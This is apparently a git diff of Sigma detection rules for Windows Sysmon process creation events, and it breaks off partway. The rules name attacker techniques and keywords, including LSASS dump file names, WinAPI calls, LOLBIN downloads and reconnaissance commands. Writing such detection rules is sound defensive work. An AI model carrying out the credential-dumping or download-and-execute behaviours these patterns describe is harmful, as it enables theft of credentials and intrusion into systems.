"00000000000001C4" "208" "c:\program files\nvidia corporation\installer2\nvvhci.{eb7b4460-7ec9-42d6-b73f-d487d4550526}" Image: C:\Windows\System32\drvinst.exe condition: process_creation and (all of selection_* and not 1 of filter*) falsepositives: - - Installers are sometimes known for creating temporary folders with GUID like - names. Add appropriate filters accordingly + - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml index 84636b1e7..3a87c7199 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml @@ -1,8 +1,7 @@ title: Parent in Public Folder Suspicious Process id: 69bd9b97-2be2-41b6-9816-fb08757a4d1a status: test -description: This rule detects suspicious processes with parent images located in - the C:\Users\Public folder +description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder references: - https://redcanary.com/blog/blackbyte-ransomware/ author: Florian Roth (Nextron Systems) @@ -23,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ParentImage|startswith: C:\Users\Public\ - CommandLine|contains: + CommandLine|contains: - powershell - 'cmd.exe /c ' - 'cmd.exe /r ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path.yml index b3225f1c9..c7f601878 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path.yml @@ -22,26 +22,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|contains: - - \$Recycle.bin\ - - \config\systemprofile\ - - \Intel\Logs\ - - \RSA\MachineKeys\ - - \Users\All Users\ - - \Users\Default\ - - \Users\NetworkService\ - - \Users\Public\ - - \Windows\addins\ - - \Windows\debug\ - - \Windows\Fonts\ - - \Windows\Help\ - - \Windows\IME\ - - \Windows\Media\ - - \Windows\repair\ - - \Windows\security\ - - \Windows\System32\Tasks\ - - \Windows\Tasks\ - - Image|startswith: C:\Perflogs\ + - Image|contains: + - \$Recycle.bin\ + - \config\systemprofile\ + - \Intel\Logs\ + - \RSA\MachineKeys\ + - \Users\All Users\ + - \Users\Default\ + - \Users\NetworkService\ + - \Users\Public\ + - \Windows\addins\ + - \Windows\debug\ + - \Windows\Fonts\ + - \Windows\Help\ + - \Windows\IME\ + - \Windows\Media\ + - \Windows\repair\ + - \Windows\security\ + - \Windows\System32\Tasks\ + - \Windows\Tasks\ + - Image|startswith: C:\Perflogs\ filter_ibm: Image|startswith: C:\Users\Public\IBM\ClientSolutions\Start_Programs\ filter_citrix: diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path_webserver.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path_webserver.yml index 46da054ca..ab81e418c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path_webserver.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_execution_path_webserver.yml @@ -1,8 +1,7 @@ title: Execution in Webserver Root Folder id: 35efb964-e6a5-47ad-bbcd-19661854018d status: test -description: Detects a suspicious program execution in a web service root folder (filter - out false positives) +description: Detects a suspicious program execution in a web service root folder (filter out false positives) author: Florian Roth (Nextron Systems) date: 2019/01/16 modified: 2021/11/27 diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_file_characteristics.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_file_characteristics.yml index 5369724f1..999e856e3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_file_characteristics.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_file_characteristics.yml @@ -1,8 +1,7 @@ title: Suspicious File Characteristics Due to Missing Fields id: 9637e8a5-7131-4f7f-bdc7-2b05d8670c43 status: test -description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company - likely created with py2exe +description: Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe references: - https://securelist.com/muddywater/88059/ - https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection @@ -31,8 +30,7 @@ detection: Company: \? folder: Image|contains: \Downloads\ - condition: process_creation and ((selection1 or selection2 or selection3) and - folder) + condition: process_creation and ((selection1 or selection2 or selection3) and folder) fields: - CommandLine - ParentCommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_gather_network_info_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_gather_network_info_execution.yml index 4fc4d7b74..b6fe41d61 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_gather_network_info_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_gather_network_info_execution.yml @@ -1,13 +1,12 @@ title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS id: 07aa184a-870d-413d-893a-157f317f6f58 related: - - id: f92a6f1e-a512-4a15-9735-da09e78d7273 - type: similar - - id: 575dce0c-8139-4e30-9295-1ee75969f7fe - type: similar + - id: f92a6f1e-a512-4a15-9735-da09e78d7273 # FileCreate + type: similar + - id: 575dce0c-8139-4e30-9295-1ee75969f7fe # ProcCreation LOLBIN + type: similar status: test -description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". - Which can be used to gather information about the target machine +description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine references: - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government @@ -27,7 +26,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: gatherNetworkInfo.vbs + CommandLine|contains: gatherNetworkInfo.vbs filter: Image|endswith: - \cscript.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml index ef7e90419..f8cb0bfc6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml @@ -1,14 +1,11 @@ title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI id: 0900463c-b33b-49a8-be1d-552a3b553dae related: - - id: a8f866e1-bdd4-425e-a27a-37619238d9c7 - type: similar + - id: a8f866e1-bdd4-425e-a27a-37619238d9c7 + type: similar status: experimental -description: 'Detects command line containing reference to the "::$index_allocation" - stream, which can be used as a technique to prevent access to folders or files - from tooling such as "explorer.exe" or "powershell.exe" - - ' +description: | + Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe" references: - https://twitter.com/pfiatde/status/1681977680688738305 - https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/ @@ -29,7 +26,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ::$index_allocation + # Note: Both Sysmon and ETW are unable to log the presence of such stream in the CommandLine. But EDRs such as Crowdstrike are able to using for example CMD console history. Users are advised to test this before usage + CommandLine|contains: ::$index_allocation condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml index 4c522ae76..81aa4a522 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml @@ -1,9 +1,7 @@ title: Writing Of Malicious Files To The Fonts Folder id: ae9b0bd7-8888-4606-b444-0ed7410cb728 status: test -description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ - location. This folder doesn't require admin privillege to be written and executed - from. +description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. references: - https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/ author: Sreeman @@ -23,16 +21,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: + CommandLine|contains: - echo - copy - type - file createnew - cacls selection_2: - CommandLine|contains: C:\Windows\Fonts\ + CommandLine|contains: C:\Windows\Fonts\ selection_3: - CommandLine|contains: + CommandLine|contains: - .sh - .exe - .dll diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml index d3b0dfb9b..e45e4dbe2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml @@ -1,16 +1,10 @@ title: Potential Homoglyph Attack Using Lookalike Characters id: 32e280f1-8ad4-46ef-9e80-910657611fbc status: experimental -description: 'Detects the presence of unicode characters which are homoglyphs, or - identical in appearance, to ASCII letter characters. - - This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs - are included; these are characters that - - are indistinguishable from ASCII characters and thus may make excellent candidates - for homoglyph attack characters. - - ' +description: | + Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. + This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that + are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. references: - https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish - http://www.irongeek.com/homoglyph-attack-generator.php @@ -20,6 +14,7 @@ tags: - attack.defense_evasion - attack.t1036 - attack.t1036.003 + # - attack.t1036.008 - sysmon logsource: category: process_creation @@ -29,60 +24,59 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_upper: - CommandLine|contains: - - "\u0410" - - "\u0412" - - "\u0415" - - "\u041A" - - "\u041C" - - "\u041D" - - "\u041E" - - "\u0420" - - "\u0421" - - "\u0422" - - "\u0425" - - "\u0405" - - "\u0406" - - "\u0408" - - "\u04AE" - - "\u04C0" - - "\u050C" - - "\u051A" - - "\u051C" - - "\u0391" - - "\u0392" - - "\u0395" - - "\u0396" - - "\u0397" - - "\u0399" - - "\u039A" - - "\u039C" - - "\u039D" - - "\u039F" - - "\u03A1" - - "\u03A4" - - "\u03A5" - - "\u03A7" + CommandLine|contains: + - А # А/A + - В # В/B + - Е # Е/E + - К # К/K + - М # М/M + - Н # Н/H + - О # О/O + - Р # Р/P + - С # С/C + - Т # Т/T + - Х # Х/X + - Ѕ # Ѕ/S + - І # І/I + - Ј # Ј/J + - Ү # Ү/Y + - Ӏ # Ӏ/I + - Ԍ # Ԍ/G + - Ԛ # Ԛ/Q + - Ԝ # Ԝ/W + - Α # Α/A + - Β # Β/B + - Ε # Ε/E + - Ζ # Ζ/Z + - Η # Η/H + - Ι # Ι/I + - Κ # Κ/K + - Μ # Μ/M + - Ν # Ν/N + - Ο # Ο/O + - Ρ # Ρ/P + - Τ # Τ/T + - Υ # Υ/Y + - Χ # Χ/X selection_lower: - CommandLine|contains: - - "\u0430" - - "\u0435" - - "\u043E" - - "\u0440" - - "\u0441" - - "\u0445" - - "\u0455" - - "\u0456" - - "\u04CF" - - "\u0458" - - "\u04BB" - - "\u0501" - - "\u051B" - - "\u051D" - - "\u03BF" + CommandLine|contains: + - а # а/a + - е # е/e + - о # о/o + - р # р/p + - с # с/c + - х # х/x + - ѕ # ѕ/s + - і # і/i + - ӏ # ӏ/l + - ј # ј/j + - һ # һ/h + - ԁ # ԁ/d + - ԛ # ԛ/q + - ԝ # ԝ/w + - ο # ο/o condition: process_creation and (1 of selection_*) falsepositives: - - Commandlines with legitimate Cyrillic text; will likely require tuning (or not - be usable) in countries where these alphabets are in use. + - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_image_missing.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_image_missing.yml index ceef9a3be..025cfbf60 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_image_missing.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_image_missing.yml @@ -1,9 +1,7 @@ title: Execution Of Non-Existing File id: 71158e3f-df67-472b-930e-7d287acaa3e1 status: test -description: Checks whether the image specified in a process creation event is not - a full, absolute path (caused by process ghosting or other unorthodox methods - to start a process) +description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ author: Max Altgelt (Nextron Systems) @@ -22,21 +20,21 @@ detection: image_absolute_path: Image|contains: \ filter_null: - Image: null + Image: filter_empty: Image: - '-' - '' filter_4688: - - Image: - - System - - Registry - - MemCompression - - vmmem - - CommandLine: - - Registry - - MemCompression - - vmmem + - Image: + - System + - Registry + - MemCompression + - vmmem + - CommandLine: + - Registry + - MemCompression + - vmmem condition: process_creation and (not image_absolute_path and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml index 13dee2e12..9cbfd7d63 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml @@ -17,8 +17,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: - - TVqQAAMAAAAEAAAA + CommandLine|contains: + - TVqQAAMAAAAEAAAA # MZ.......... - TVpQAAIAAAAEAA8A - TVqAAAEAAAAEABAA - TVoAAAAAAAAAAAAA diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_inline_win_api_access.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_inline_win_api_access.yml index 21bf7c1ab..c5922125a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_inline_win_api_access.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_inline_win_api_access.yml @@ -1,11 +1,10 @@ title: Potential WinAPI Calls Via CommandLine id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 related: - - id: 03d83090-8cba-44a0-b02f-0b756a050306 - type: derived + - id: 03d83090-8cba-44a0-b02f-0b756a050306 + type: derived status: test -description: Detects the use of WinAPI Functions via the commandline. As seen used - by threat actors via the tool winapiexec +description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec references: - https://twitter.com/m417z/status/1566674631788007425 author: Nasreddine Bencherchali (Nextron Systems) @@ -23,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - AddSecurityPackage - AdjustTokenPrivileges - Advapi32 @@ -49,6 +48,7 @@ detection: - LoadLibrary - memcpy - MiniDumpWriteDump + # - 'msvcrt' - ntdll - OpenDesktop - OpenProcess @@ -62,6 +62,7 @@ detection: - RtlCreateUserThread - secur32 - SetThreadToken + # - 'user32' - VirtualAlloc - VirtualFree - VirtualProtect @@ -71,7 +72,7 @@ detection: - ZeroFreeGlobalAllocUnicode filter_optional_mpcmdrun: Image|endswith: \MpCmdRun.exe - CommandLine|contains: GetLoadLibraryWAddress32 + CommandLine|contains: GetLoadLibraryWAddress32 condition: process_creation and (selection and not 1 of filter_optional_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml index 7dc825537..4a17f5874 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml @@ -26,38 +26,37 @@ detection: - \qwinsta.exe selection_other_wmi: Image|endswith: \wmic.exe - CommandLine|contains|all: + CommandLine|contains|all: - useraccount - get selection_other_cmdkey: Image|endswith: \cmdkey.exe - CommandLine|contains: ' /l' + CommandLine|contains: ' /l' selection_cmd: Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' /c' - 'dir ' - \Users\ filter_cmd: - CommandLine|contains: ' rmdir ' + CommandLine|contains: ' rmdir ' # don't match on 'dir' "C:\Windows\System32\cmd.exe" /q /c rmdir /s /q "C:\Users\XX\AppData\Local\Microsoft\OneDrive\19.232.1124.0005" selection_net: Image|endswith: - \net.exe - \net1.exe - CommandLine|contains: user + CommandLine|contains: user filter_net: - CommandLine|contains: - - /domain - - /add - - /delete - - /active - - /expires - - /passwordreq - - /scriptpath - - /times - - /workstations - condition: process_creation and ((selection_cmd and not filter_cmd) or (selection_net - and not filter_net) or 1 of selection_other_*) + CommandLine|contains: + - /domain # local account discovery only + - /add # discovery only + - /delete # discovery only + - /active # discovery only + - /expires # discovery only + - /passwordreq # discovery only + - /scriptpath # discovery only + - /times # discovery only + - /workstations # discovery only + condition: process_creation and ((selection_cmd and not filter_cmd) or (selection_net and not filter_net) or 1 of selection_other_*) falsepositives: - Legitimate administrator or user enumerates local users for legitimate reason level: low diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml index e01e2421b..7aaa5c2d0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml @@ -1,17 +1,15 @@ title: LOLBIN Execution From Abnormal Drive id: d4ca7c59-e9e4-42d8-bf57-91a776efcb87 related: - - id: 5b80cf53-3a46-4adc-960b-05ec19348d74 - type: similar + - id: 5b80cf53-3a46-4adc-960b-05ec19348d74 + type: similar status: test -description: Detects LOLBINs executing from an abnormal or uncommon drive such as - a mounted ISO. +description: Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO. references: - https://thedfirreport.com/2021/12/13/diavol-ransomware/ - https://www.scythe.io/library/threat-emulation-qakbot - https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/ -author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - - SEC Consult '@angelo_violetti', Aaron Herman +author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti', Aaron Herman date: 2022/01/25 modified: 2023/08/29 tags: @@ -25,32 +23,33 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \calc.exe - - \certutil.exe - - \cmstp.exe - - \cscript.exe - - \installutil.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - OriginalFileName: - - CALC.EXE - - CertUtil.exe - - CMSTP.EXE - - cscript.exe - - installutil.exe - - MSHTA.EXE - - REGSVR32.EXE - - RUNDLL32.EXE - - wscript.exe + # Note: add more lolbins for additional coverage + - Image|endswith: + - \calc.exe + - \certutil.exe + - \cmstp.exe + - \cscript.exe + - \installutil.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - OriginalFileName: + - CALC.EXE + - CertUtil.exe + - CMSTP.EXE + - cscript.exe + - installutil.exe + - MSHTA.EXE + - REGSVR32.EXE + - RUNDLL32.EXE + - wscript.exe filter_main_currentdirectory: CurrentDirectory|contains: C:\ filter_main_empty: CurrentDirectory: '' filter_main_null: - CurrentDirectory: null + CurrentDirectory: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Rare false positives could occur on servers with multiple drives. diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml index 49965adb9..7bad3f13a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml @@ -1,14 +1,11 @@ title: LSASS Dump Keyword In CommandLine id: ffa6861c-4461-4f59-8a41-578c39f3f23e related: - - id: a5a2d357-1ab8-4675-a967-ef9990a59391 - type: derived + - id: a5a2d357-1ab8-4675-a967-ef9990a59391 + type: derived status: test -description: 'Detects the presence of the keywords "lsass" and ".dmp" in the commandline, - which could indicate a potential attempt to dump or create a dump of the lsass - process. - - ' +description: | + Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process. references: - https://github.com/Hackndo/lsassy - https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf @@ -16,8 +13,7 @@ references: - https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/ - https://github.com/helpsystems/nanodump - https://github.com/CCob/MirrorDump -author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron - Systems) +author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/24 modified: 2023/08/29 tags: @@ -32,25 +28,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains: - - lsass.dmp - - lsass.zip - - lsass.rar - - Andrew.dmp - - Coredump.dmp - - NotLSASS.zip - - lsass_2 - - lsassdump - - lsassdmp - - CommandLine|contains|all: - - lsass - - .dmp - - CommandLine|contains|all: - - SQLDmpr - - .mdmp - - CommandLine|contains|all: - - nanodump - - .dmp + - CommandLine|contains: + - lsass.dmp + - lsass.zip + - lsass.rar + - Andrew.dmp + - Coredump.dmp + - NotLSASS.zip # https://github.com/CCob/MirrorDump + - lsass_2 # default format of procdump v9.0 is lsass_YYMMDD_HHmmss.dmp + - lsassdump + - lsassdmp + - CommandLine|contains|all: + - lsass + - .dmp + - CommandLine|contains|all: + - SQLDmpr + - .mdmp + - CommandLine|contains|all: + - nanodump + - .dmp condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml index a216401c8..135c0e12c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml @@ -1,15 +1,12 @@ title: Potential File Download Via MS-AppInstaller Protocol Handler id: 180c7c5c-d64b-4a63-86e9-68910451bc8b related: - - id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a - type: derived + - id: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a + type: derived status: experimental -description: 'Detects usage of the "ms-appinstaller" protocol handler via command - line to potentially download arbitrary files via AppInstaller.EXE - +description: | + Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\" - - ' references: - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/ author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel @@ -27,7 +24,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ms-appinstaller://?source= - http condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_network_command.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_network_command.yml index 9c99ea0a6..27c3fff10 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_network_command.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_network_command.yml @@ -1,8 +1,7 @@ title: Suspicious Network Command id: a29c1813-ab1f-4dde-b489-330b952e91ae status: test -description: Adversaries may look for details about the network configuration and - settings of systems they access or through information discovery of remote systems +description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ipconfig /all - netsh interface show interface - arp -a diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_network_scan_loop.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_network_scan_loop.yml index c629fe3f1..0b89d8eb2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_network_scan_loop.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_network_scan_loop.yml @@ -1,9 +1,7 @@ title: Suspicious Scan Loop Network id: f8ad2e2c-40b6-4117-84d7-20b89896ab23 status: test -description: Adversaries may attempt to get a listing of other systems by IP address, - hostname, or other logical identifier on a network that may be used for Lateral - Movement from the current system +description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md - https://ss64.com/nt/for.html @@ -24,11 +22,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_loop: - CommandLine|contains: + CommandLine|contains: - 'for ' - 'foreach ' selection_tools: - CommandLine|contains: + CommandLine|contains: - nslookup - ping condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_network_sniffing.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_network_sniffing.yml index 8b8f690bf..576b8792c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_network_sniffing.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_network_sniffing.yml @@ -1,17 +1,10 @@ title: Potential Network Sniffing Activity Using Network Tools id: ba1f7802-adc7-48b4-9ecb-81e227fddfd5 status: test -description: 'Detects potential network sniffing via use of network tools such as - "tshark", "windump". - - Network sniffing refers to using the network interface on a system to monitor - or capture information sent over a wired or wireless connection. - - An adversary may place a network interface into promiscuous mode to passively - access data in transit over the network, or use span ports to capture a larger - amount of data. - - ' +description: | + Detects potential network sniffing via use of network tools such as "tshark", "windump". + Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. + An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems) @@ -31,7 +24,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_tshark: Image|endswith: \tshark.exe - CommandLine|contains: -i + CommandLine|contains: -i selection_windump: Image|endswith: \windump.exe condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_non_exe_image.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_non_exe_image.yml index d3b3dc0e0..11eb71664 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_non_exe_image.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_non_exe_image.yml @@ -1,14 +1,9 @@ title: Execution of Suspicious File Type Extension id: c09dad97-1c78-4f71-b127-7edb2b8e491a status: experimental -description: 'Detects whether the image specified in a process creation event doesn''t - refer to an ".exe" (or other known executable extension) file. This can be caused - by process ghosting or other unorthodox methods to start a process. - - This rule might require some initial baselining to align with some third party - tooling in the user environment. - - ' +description: | + Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. + This rule might require some initial baselining to align with some third party tooling in the user environment. references: - https://pentestlaboratories.com/2021/12/08/process-ghosting/ author: Max Altgelt (Nextron Systems) @@ -31,8 +26,8 @@ detection: - .com - .exe - .scr - - .tmp - filter_main_image: + - .tmp # sadly many installers use this extension + filter_main_image: # Windows utilities without extension Image: - System - Registry @@ -48,8 +43,8 @@ detection: - .rbf - .rbs filter_main_windows_temp: - - ParentImage|contains: :\Windows\Temp\ - - Image|contains: :\Windows\Temp\ + - ParentImage|contains: :\Windows\Temp\ + - Image|contains: :\Windows\Temp\ filter_main_deleted: Image|contains: :\$Extend\$Deleted\ filter_main_empty: @@ -57,7 +52,7 @@ detection: - '-' - '' filter_main_null: - Image: null + Image: filter_optional_avira: ParentImage|contains: :\ProgramData\Avira\ filter_optional_nvidia: @@ -83,8 +78,7 @@ detection: filter_optional_docker: ParentImage: C:\Windows\System32\services.exe Image|endswith: com.docker.service - condition: process_creation and (not known_image_extension and not 1 of filter_main_* - and not 1 of filter_optional_*) + condition: process_creation and (not known_image_extension and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml index ec9c64487..21bc021da 100644 --- 